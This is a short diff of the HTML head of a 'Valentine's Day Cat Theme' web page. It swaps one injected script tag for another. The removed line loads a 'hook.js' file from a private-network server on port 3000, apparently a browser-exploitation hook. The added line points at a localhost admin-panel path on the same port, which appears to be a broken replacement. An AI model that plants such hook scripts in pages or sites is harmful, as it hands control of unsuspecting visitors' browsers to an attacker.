--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Valentine's Day Cat Theme</title>
-     <script src="http://192.168.29.241:3000/hook.js"></script>
+     <script src="http://127.0.0.1:3000/ui/panel"></script>
 </head>
 <body style="background-color: #181818; color: #ffffff; font-family: Arial, sans-serif; margin: 0; padding: 0;">
     <div class="container" style="text-align: center; margin-top: 50px;">
